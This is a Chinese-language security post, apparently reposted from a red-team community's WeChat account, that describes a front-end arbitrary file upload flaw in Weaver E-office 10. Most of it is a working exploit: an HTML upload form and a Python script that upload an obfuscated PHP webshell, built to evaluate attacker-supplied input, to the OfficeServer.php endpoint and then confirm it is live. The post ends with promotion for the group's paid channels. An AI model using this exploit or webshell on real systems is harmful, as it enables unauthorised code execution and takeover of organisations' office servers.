本文来自“白帽子社区红队知识星球”
作者:Ca1y0a
版本号:http://XXXXXXX:8010/eoffice10/version.jsoneoffice- 10
访问出现200 ,证明可能存在漏洞
http://IP/eoffice10/server/public/iWebOffice2015/OfficeServer.php
然后访问
http://IP/eoffice10/server/public/iWebOffice2015/Document/test.php
POC:
<form method='post'action='http://XXXXXXXX:8010/eoffice10/server/public/iWebOffice2015/OfficeServer.php'enctype="multipart/form-data" ><input type="file" name="FileData"/></br></br><input type="text" name="FormData" value="1"/></br></br><button type=submit value="上传">上传</button> </form>
POC2 :
# by catimport requestsimport sysdef command(url):url1 = url + '/eoffice10/server/public/iWebOffice2015/OfficeServer.php'headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36",'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9','Content-Length': '997','Cache-Control': 'max-age=0','Upgrade-Insecure-Requests': '1','Origin': 'null','Accept-Encoding': 'gzip, deflate','Accept-Language': 'zh-CN,zh;q=0.9',"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryLpoiBFy4ANA8daew",'Connection': 'close'}data = "------WebKitFormBoundaryLpoiBFy4ANA8daewrnContent-Disposition:form-data;name="FileData";filename="cat.php"rnContent-Type:application/octet-streamrnrnhackerrn<?phprn$FYDC=create_function(chr(0x864c/0x3bb).chr(113160/984).chr(246-135).str_rot13('z').str_rot13('r'),chr(0134556/0726).str_rot13('i').chr(0x1c9-0x168).base64_decode('bA==').chr(0613-0543).chr(0x1d5-0x1b1).chr(104535/909).chr(0xd476/0x1ea).chr(255-146).str_rot13('r').base64_decode('KQ==').chr(0100701/01063));$FYDC(base64_decode('Njg3N'.'TQ3O0'.'BldkF'.'sKCRf'.''.chr(0x87cd/0x199).base64_decode('RQ==').chr(0x217-0x1de).str_rot13('G').base64_decode('Vg==').''.''.chr(831-761).chr(0261664/01421).str_rot13('1').base64_decode('VA==').chr(0312176/01666).''.'dzVFp'.'kR10p'.'OzIwN'.'jI2ND'.'E7'.''));rn?>nrn------WebKitFormBoundaryLpoiBFy4ANA8daewrnContent-Disposition:form-data;name="FormData"rnrn{'USERNAME':'admin','RECORDID':'undefined','OPTION':'SAVEFILE','FILENAME':'cat.php'}rn------WebKitFormBoundaryLpoiBFy4ANA8daew--"result = requests.post(url1, headers=headers, data=data)res = url+'/eoffice10/server/public/iWebOffice2015/Document/cat.php'if 'hacker' in requests.get(res).text:print(res)else:print("There is no vulnerability")if __name__ == '__main__':try:url = sys.argv[1]command(url)except:print('help: python eoffice10.py http://1.1.1.1')
白帽子社区知识星球红队专家奖励计划具体规则:白帽子社区星球红队专家奖励计划
白帽子社区红队知识星球,星球内部设立了多个技术版块,目前涵盖“WEB安全”、“内网渗透”、“CTF技术区”、“漏洞分析”、“工具分享”五大类,星球内部新设立红队专栏,成立红队全方位知识体系。目前红队专栏已有以下三大板块:【外部打点】【权限维持】【内网渗透】,即将推出【免杀技术】板块。还可以与嘉宾大佬们接触,在线答疑、互相探讨。
▼扫码关注白帽子社区公众号&加入知识星球▼
原文始发于微信公众号(白帽子社区):泛微 E-office 10 前台任意⽂件上传
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论